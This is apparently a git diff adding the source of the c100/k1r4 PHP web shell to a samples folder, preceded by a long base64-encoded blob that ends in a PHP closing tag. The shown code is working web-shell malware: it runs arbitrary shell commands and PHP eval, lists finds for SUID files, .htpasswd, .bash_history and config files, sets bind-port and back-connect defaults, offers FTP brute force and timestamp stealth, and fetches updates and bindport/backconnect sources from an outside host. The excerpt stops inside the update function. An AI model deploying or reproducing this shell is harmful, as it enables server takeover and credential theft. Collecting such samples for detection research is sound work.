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");?>
diff --git a/data/samples/classic/c100.php b/data/samples/classic/c100.php
new file mode 100644
index 0000000..529d1aa
--- /dev/null
+++ b/data/samples/classic/c100.php
@@ -0,0 +1,3154 @@
1<?php
2//Starting calls
3if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
4error_reporting(5);
5@ignore_user_abort(TRUE);
6@set_magic_quotes_runtime(0);
7$win = strtolower(substr(PHP_OS,0,3)) == "win";
8define("starttime",getmicrotime());
9if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
10$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
11foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
12
13$shver = "MeTaLTeaM (ORG) was here"; //Current version
14//CONFIGURATION AND SETTINGS
15if (!empty($unset_surl)) {setcookie("k1r4_surl"); $surl = "";}
16elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("k1r4_surl",$surl);}
17else {$surl = $_REQUEST["k1r4_surl"]; //Set this cookie for manual SURL
18}
19
20$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
21
22if ($surl_autofill_include and !$_REQUEST["k1r4_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
23if (empty($surl))
24{
25 $surl = "?".$includestr; //Self url
26}
27$surl = htmlspecialchars($surl);
28
29$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
30
31
32$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
33$login_txt = "Restricted area"; //http-auth message.
34$accessdeniedmess = " MeTaLTeaM . Org ".$shver.": access denied";
35
36$gzipencode = TRUE; //Encode with gzip?
37
38$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
39
40$k1r4_updateurl = "http://emp3ror.com/kira//update/"; //Update server
41$k1r4_sourcesurl = "http://emp3ror.com/kira/"; //Sources-server
42
43$filestealth = TRUE; //if TRUE, don't change modify- and access-time
44
45$donated_html = "<center><b>Owned by MeTaLTeaM . O R G</b></center>";
46/* If you publish free shell and you wish
47add link to your site or any other information,
48put here your html. */
49$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
50
51$curdir = "./"; //start folder
52//$curdir = getenv("DOCUMENT_ROOT");
53$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
54$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
55
56$log_email = "+-àèù@gmail.com"; //Default e-mail for sending logs
57
58$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
59$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
60
61// Registered file-types.
62// array(
63// "{action1}"=>array("ext1","ext2","ext3",...),
64// "{action2}"=>array("ext4","ext5","ext6",...),
65// ...
66// )
67$ftypes = array(
68 "html"=>array("html","htm","shtml"),
69 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
70 "exe"=>array("sh","install","bat","cmd"),
71 "ini"=>array("ini","inf"),
72 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
73 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
74 "sdb"=>array("sdb"),
75 "phpsess"=>array("sess"),
76 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
77);
78
79// Registered executable file-types.
80// array(
81// string "command{i}"=>array("ext1","ext2","ext3",...),
82// ...
83// )
84// {command}: %f% = filename
85$exeftypes = array(
86 getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
87 "perl %f%" => array("pl","cgi")
88);
89
90/* Highlighted files.
91 array(
92 i=>array({regexp},{type},{opentag},{closetag},{break})
93 ...
94 )
95 string {regexp} - regular exp.
96 int {type}:
970 - files and folders (as default),
981 - files only, 2 - folders only
99 string {opentag} - open html-tag, e.g. "<b>" (default)
100 string {closetag} - close html-tag, e.g. "</b>" (default)
101 bool {break} - if TRUE and found match then break
102*/
103$regxp_highlight = array(
104 array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
105 array("config.php",1) // example
106);
107
108$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
109 // array (i=>{letter} ...); string {letter} - letter of a drive
110//$safemode_diskettes = range("a","z");
111$hexdump_lines = 8;// lines in hex preview file
112$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
113
114$nixpwdperpage = 100; // Get first N lines from /etc/passwd
115
116$bindport_pass = "k1r4"; // default password for binding
117$bindport_port = "31373"; // default port for binding
118$bc_port = "31373"; // default port for back-connect
119$datapipe_localport = "8081"; // default port for datapipe
120
121// Command-aliases
122if (!$win)
123{
124 $cmdaliases = array(
125 array("-----------------------------------------------------------", "ls -la"),
126 array("find all suid files", "find / -type f -perm -04000 -ls"),
127 array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
128 array("find all sgid files", "find / -type f -perm -02000 -ls"),
129 array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
130 array("find config.inc.php files", "find / -type f -name config.inc.php"),
131 array("find config* files", "find / -type f -name \"config*\""),
132 array("find config* files in current dir", "find . -type f -name \"config*\""),
133 array("find all writable folders and files", "find / -perm -2 -ls"),
134 array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
135 array("find all service.pwd files", "find / -type f -name service.pwd"),
136 array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
137 array("find all .htpasswd files", "find / -type f -name .htpasswd"),
138 array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
139 array("find all .bash_history files", "find / -type f -name .bash_history"),
140 array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
141 array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
142 array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
143 array("list file attributes on a Linux second extended file system", "lsattr -va"),
144 array("show opened ports", "netstat -an | grep -i listen")
145 );
146}
147else
148{
149 $cmdaliases = array(
150 array("-----------------------------------------------------------", "dir"),
151 array("show opened ports", "netstat -an")
152 );
153}
154
155$sess_cookie = "k1r4vars"; // Cookie-variable name
156
157$usefsbuff = TRUE; //Buffer-function
158$copy_unset = FALSE; //Remove copied files from buffer after pasting
159
160//Quick launch
161$quicklaunch = array(
162 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
163 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
164 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
165 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
166 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
167 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
168 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
169 array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
170 array("<b>Tools</b>",$surl."act=tools&d=%d"),
171 array("<b>Proc.</b>",$surl."act=processes&d=%d"),
172 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
173 array("<b>Sec.</b>",$surl."act=security&d=%d"),
174 array("<b>SQL</b>",$surl."act=sql&d=%d"),
175 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
176 array("<b>Update</b>",$surl."act=update&d=%d"),
177 array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
178 array("<b>Self remove</b>",$surl."act=selfremove"),
179 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
180);
181
182//Highlight-code colors
183$highlight_background = "#c0c0c0";
184$highlight_bg = "#FFFFFF";
185$highlight_comment = "#6A6A6A";
186$highlight_default = "#0000BB";
187$highlight_html = "#1300FF";
188$highlight_keyword = "#007700";
189$highlight_string = "#000000";
190
191@$f = $_REQUEST["f"];
192@extract($_REQUEST["k1r4cook"]);
193
194//END CONFIGURATION
195
196
197// \/Next code isn't for editing\/
198@set_time_limit(0);
199$tmp = array();
200foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
201$s = "!^(".implode("|",$tmp).")$!i";
202if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://google.com/releases/ckira\">kira</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
203if (!empty($login))
204{
205 if (empty($md5_pass)) {$md5_pass = md5($pass);}
206 if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
207 {
208 if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
209 header("WWW-Authenticate: Basic realm=\"kira ".$shver.": ".$login_txt."\"");
210 header("HTTP/1.0 401 Unauthorized");
211 exit($accessdeniedmess);
212 }
213}
214if ($act != "img")
215{
216$lastdir = realpath(".");
217chdir($curdir);
218if ($selfwrite or $updatenow) {@ob_clean(); k1r4_getupdate($selfwrite,1); exit;}
219$sess_data = unserialize($_COOKIE["$sess_cookie"]);
220if (!is_array($sess_data)) {$sess_data = array();}
221if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
222if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
223
224$disablefunc = @ini_get("disable_functions");
225if (!empty($disablefunc))
226{
227 $disablefunc = str_replace(" ","",$disablefunc);
228 $disablefunc = explode(",",$disablefunc);
229}
230
231if (!function_exists("k1r4_buff_prepare"))
232{
233function k1r4_buff_prepare()
234{
235 global $sess_data;
236 global $act;
237 foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
238 foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
239 $sess_data["copy"] = array_unique($sess_data["copy"]);
240 $sess_data["cut"] = array_unique($sess_data["cut"]);
241 sort($sess_data["copy"]);
242 sort($sess_data["cut"]);
243 if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
244 else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
245}
246}
247k1r4_buff_prepare();
248if (!function_exists("k1r4_sess_put"))
249{
250function k1r4_sess_put($data)
251{
252 global $sess_cookie;
253 global $sess_data;
254 k1r4_buff_prepare();
255 $sess_data = $data;
256 $data = serialize($data);
257 setcookie($sess_cookie,$data);
258}
259}
260foreach (array("sort","sql_sort") as $v)
261{
262 if (!empty($_GET[$v])) {$$v = $_GET[$v];}
263 if (!empty($_POST[$v])) {$$v = $_POST[$v];}
264}
265if ($sort_save)
266{
267 if (!empty($sort)) {setcookie("sort",$sort);}
268 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
269}
270if (!function_exists("str2mini"))
271{
272function str2mini($content,$len)
273{
274 if (strlen($content) > $len)
275 {
276 $len = ceil($len/2) - 2;
277 return substr($content, 0,$len)."...".substr($content,-$len);
278 }
279 else {return $content;}
280}
281}
282if (!function_exists("view_size"))
283{
284function view_size($size)
285{
286 if (!is_numeric($size)) {return FALSE;}
287 else
288 {
289 if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
290 elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
291 elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
292 else {$size = $size . " B";}
293 return $size;
294 }
295}
296}
297if (!function_exists("fs_copy_dir"))
298{
299function fs_copy_dir($d,$t)
300{
301 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
302 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
303 $h = opendir($d);
304 while (($o = readdir($h)) !== FALSE)
305 {
306 if (($o != ".") and ($o != ".."))
307 {
308 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
309 else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
310 if (!$ret) {return $ret;}
311 }
312 }
313 closedir($h);
314 return TRUE;
315}
316}
317if (!function_exists("fs_copy_obj"))
318{
319function fs_copy_obj($d,$t)
320{
321 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
322 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
323 if (!is_dir(dirname($t))) {mkdir(dirname($t));}
324 if (is_dir($d))
325 {
326 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
327 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
328 return fs_copy_dir($d,$t);
329 }
330 elseif (is_file($d)) {return copy($d,$t);}
331 else {return FALSE;}
332}
333}
334if (!function_exists("fs_move_dir"))
335{
336function fs_move_dir($d,$t)
337{
338 $h = opendir($d);
339 if (!is_dir($t)) {mkdir($t);}
340 while (($o = readdir($h)) !== FALSE)
341 {
342 if (($o != ".") and ($o != ".."))
343 {
344 $ret = TRUE;
345 if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
346 else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
347 if (!$ret) {return $ret;}
348 }
349 }
350 closedir($h);
351 return TRUE;
352}
353}
354if (!function_exists("fs_move_obj"))
355{
356function fs_move_obj($d,$t)
357{
358 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
359 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
360 if (is_dir($d))
361 {
362 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
363 if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
364 return fs_move_dir($d,$t);
365 }
366 elseif (is_file($d))
367 {
368 if(copy($d,$t)) {return unlink($d);}
369 else {unlink($t); return FALSE;}
370 }
371 else {return FALSE;}
372}
373}
374if (!function_exists("fs_rmdir"))
375{
376function fs_rmdir($d)
377{
378 $h = opendir($d);
379 while (($o = readdir($h)) !== FALSE)
380 {
381 if (($o != ".") and ($o != ".."))
382 {
383 if (!is_dir($d.$o)) {unlink($d.$o);}
384 else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
385 }
386 }
387 closedir($h);
388 rmdir($d);
389 return !is_dir($d);
390}
391}
392if (!function_exists("fs_rmobj"))
393{
394function fs_rmobj($o)
395{
396 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
397 if (is_dir($o))
398 {
399 if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
400 return fs_rmdir($o);
401 }
402 elseif (is_file($o)) {return unlink($o);}
403 else {return FALSE;}
404}
405}
406if (!function_exists("myshellexec"))
407{
408function myshellexec($cmd)
409{
410 global $disablefunc;
411 $result = "";
412 if (!empty($cmd))
413 {
414 if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
415 elseif (($result = `$cmd`) !== FALSE) {}
416 elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
417 elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
418 elseif (is_resource($fp = popen($cmd,"r")))
419 {
420 $result = "";
421 while(!feof($fp)) {$result .= fread($fp,1024);}
422 pclose($fp);
423 }
424 }
425 return $result;
426}
427}
428if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
429if (!function_exists("view_perms"))
430{
431function view_perms($mode)
432{
433 if (($mode & 0xC000) === 0xC000) {$type = "s";}
434 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
435 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
436 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
437 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
438 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
439 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
440 else {$type = "?";}
441
442 $owner["read"] = ($mode & 00400)?"r":"-";
443 $owner["write"] = ($mode & 00200)?"w":"-";
444 $owner["execute"] = ($mode & 00100)?"x":"-";
445 $group["read"] = ($mode & 00040)?"r":"-";
446 $group["write"] = ($mode & 00020)?"w":"-";
447 $group["execute"] = ($mode & 00010)?"x":"-";
448 $world["read"] = ($mode & 00004)?"r":"-";
449 $world["write"] = ($mode & 00002)? "w":"-";
450 $world["execute"] = ($mode & 00001)?"x":"-";
451
452 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
453 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
454 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
455
456 return $type.join("",$owner).join("",$group).join("",$world);
457}
458}
459if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
460if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
461if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
462if (!function_exists("parse_perms"))
463{
464function parse_perms($mode)
465{
466 if (($mode & 0xC000) === 0xC000) {$t = "s";}
467 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
468 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
469 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
470 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
471 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
472 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
473 else {$t = "?";}
474 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
475 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
476 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
477 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
478}
479}
480if (!function_exists("parsesort"))
481{
482function parsesort($sort)
483{
484 $one = intval($sort);
485 $second = substr($sort,-1);
486 if ($second != "d") {$second = "a";}
487 return array($one,$second);
488}
489}
490if (!function_exists("view_perms_color"))
491{
492function view_perms_color($o)
493{
494 if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
495 elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
496 else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
497}
498}
499if (!function_exists("k1r4getsource"))
500{
501function k1r4getsource($fn)
502{
503 global $k1r4_sourcesurl;
504 $array = array(
505 "k1r4_bindport.pl" => "k1r4_bindport_pl.txt",
506 "k1r4_bindport.c" => "k1r4_bindport_c.txt",
507 "k1r4_backconn.pl" => "k1r4_backconn_pl.txt",
508 "k1r4_backconn.c" => "k1r4_backconn_c.txt",
509 "k1r4_datapipe.pl" => "k1r4_datapipe_pl.txt",
510 "k1r4_datapipe.c" => "k1r4_datapipe_c.txt",
511 );
512 $name = $array[$fn];
513 if ($name) {return file_get_contents($k1r4_sourcesurl.$name);}
514 else {return FALSE;}
515}
516}
517if (!function_exists("k1r4_getupdate"))
518{
519function k1r4_getupdate($update = TRUE)
520{
521 $url = $GLOBALS["k1r4_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
522 $data = @file_get_contents($url);
523 if (!$data) {return "Can't connect to update-server!";}
524 else
525 {
526 $data = ltrim($data);
527 $string = substr($data,3,ord($data{2}));
528 if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
529 if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
530 if ($data{0} == "\x99" and $data{1} == "\x03")
531 {
532 $string = explode("\x01",$string);
